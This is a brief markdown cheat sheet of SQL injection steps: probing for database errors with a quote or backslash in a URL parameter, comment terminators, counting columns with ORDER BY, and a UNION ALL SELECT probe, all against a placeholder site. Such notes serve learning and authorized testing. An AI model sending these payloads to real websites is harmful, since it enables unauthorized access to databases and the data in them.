## Error Based injection

#### Testing to get a database Error

  ```sql
  > http://blabla.com?id=1\
  > http://blabla.com?id=1'
  ```

#### Sql comment

  ```sql
  # + is the encode of space
  > http://blabla.com?id=1\--+
  > http://blabla.com?id=1'#
  ```

## join querys

  - ##### To see how many columns used in this query

    ```sql
    # 3 is our guess for used columns
    > http://blabla.com?id=1' order by 3 --+
    ```

  - ##### union all s

    ```sql
    > http://blabla.com?id=1' union all select 1,2,3 --+
    ```
